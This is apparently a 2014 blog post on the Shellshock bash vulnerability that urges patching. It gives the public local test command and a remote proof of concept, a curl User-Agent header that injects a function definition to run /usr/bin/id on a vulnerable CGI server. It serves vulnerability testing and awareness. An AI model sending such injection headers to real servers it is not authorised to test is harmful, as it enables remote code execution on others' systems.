Saturday, September 27, 2014

ShellShock Testing

Patch your /usr/bin/bash  NOW. The 'Shellshock' bug blasts OS X, Linux systems wide open. The attack vectors are the CGI scripts to DHCP clients (and maybe more), which will lead to remote-code execution.

Proof of Concept - at local system
A simple test to check if your Bash is vulnerable is available publicly.
$ env var='() { :;}; echo vulnerable' bash -c /bin/true  
Upon running the above command, an affected version of bash will output "vulnerable". Once the patch has been applied, the same test will return the following result.
bash: warning: var: ignoring function definition attempt  bash: error importing function definition for 'var'  

Proof of Concept - to a remote server.
curl -A "() { ignored; }; echo Content-Type: text/plain ; echo  ; echo ; /usr/bin/id" 
A vulnerable web CGI will return uid=48(apache) gid=48(apache) groups=48(apache), and follow by HTML page. A non-vulnerable should return just the HTML page.